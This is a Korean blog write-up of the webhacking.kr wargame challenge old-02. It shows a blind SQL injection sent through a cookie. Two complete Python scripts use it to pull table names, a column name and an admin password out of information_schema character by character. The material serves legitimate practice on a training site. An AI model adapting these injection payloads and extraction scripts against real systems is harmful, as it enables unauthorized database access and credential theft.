old-02

chwrld·2025년 6월 21일
webhacking.kr

webhacking.kr

목록 보기
3/3

테이블 개수 알아내기

(select count(table_name) from information_schema.tables where table_schema=database())
-> 2

테이블 이름 길이 추출

(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)
-> 13
(select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)
-> 3

테이블 이름 추출

(SELECT ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1)
-> extract_table_name.py

# extract_table_name.py
import re
import requests
from bs4 import BeautifulSoup, Comment

url = 'https://webhacking.kr/challenge/web-02/'

table_name = ''
length = 13

for pos in range(1, length+1):
    # SQLi 페이로드
    payload = (
        f"(SELECT ASCII(SUBSTRING(table_name,{pos},1)) "
        "FROM information_schema.tables "
        "WHERE table_schema=DATABASE() "
        "LIMIT 0,1"
        ")-- -"
    )
    cookies = {
        'time': payload
    }
    r = requests.get(url, cookies=cookies)
    soup = BeautifulSoup(r.text, 'html.parser')

    # 1) 모든 주석 노드 찾아내기
    comments = soup.find_all(string=lambda text: isinstance(text, Comment))
    # comments 예시: ['\n2070-01-01 09:01:59\n', ' if you access admin.php ... ']

    # 2) 타임스탬프 주석 골라내기 (YYYY-MM-DD HH:MM:SS)
    ts = None
    for c in comments:
        m = re.search(r'(\d{4}-\d{2}-\d{2})\s+(\d{2}):(\d{2}):(\d{2})', c)
        if m:
            hh, mm, ss = map(int, m.groups()[1:])
            ts = mm * 60 + ss
            break
    if ts is None:
        raise ValueError(f"#{pos}: 타임스탬프 주석을 못 찾았습니다.")
    
    ch = chr(ts)
    table_name += ch
    print(f"#{pos} → ASCII {ts} → '{ch}'")

print("추출된 테이블명:", table_name)

컬럼 개수 추출

(SELECT count(column_name) from information_schema.columns WHERE table_name="admin_area_pw")
-> 1

컬럼 이름 길이 추출

(SELECT length(coulmn_name) from information_schema.columns WHERE table_name="admin_area_pw")
-> 2

컬럼 이름 추출

(SELECT ASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE table_name="admin_area_pw")
-> {112, 119} =>pw

pw 컬럼 데이터 길이 추출

SELECT length(pw) from admin_area_pw
-> 17

pw 컬럼 데이터 추출

(SELECT ASCII(SUBSTRING(pw, 1, 1)) FROM admin_area_pw)
-> extract_pw.py

# extract_pw.py
import re
import requests
from bs4 import BeautifulSoup, Comment

url = 'https://webhacking.kr/challenge/web-02/'

pw = ''
length = 17

for pos in range(1, length+1):
    # SQLi 페이로드
    payload = (
        f"(SELECT ASCII(SUBSTRING(pw, {pos}, 1)) "
        "FROM admin_area_pw)"
    )
    cookies = {
    
        'time': payload
    }
    r = requests.get(url, cookies=cookies)
    soup = BeautifulSoup(r.text, 'html.parser')

    # 1) 모든 주석 노드 찾아내기
    comments = soup.find_all(string=lambda text: isinstance(text, Comment))
    # comments 예시: ['\n2070-01-01 09:01:59\n', ' if you access admin.php ... ']

    # 2) 타임스탬프 주석 골라내기 (YYYY-MM-DD HH:MM:SS)
    ts = None
    for c in comments:
        m = re.search(r'(\d{4}-\d{2}-\d{2})\s+(\d{2}):(\d{2}):(\d{2})', c)
        if m:
            hh, mm, ss = map(int, m.groups()[1:])
            ts = mm * 60 + ss
            break
    if ts is None:
        raise ValueError(f"#{pos}: 타임스탬프 주석을 못 찾았습니다.")
    
    ch = chr(ts)
    pw += ch
    print(f"#{pos} → ASCII {ts} → '{ch}'")

print("추출된 pw:", pw)
profile
chwrld
BoB 13th 최강포린이👮
이전 포스트

[webhacking.kr] old-39

0개의 댓글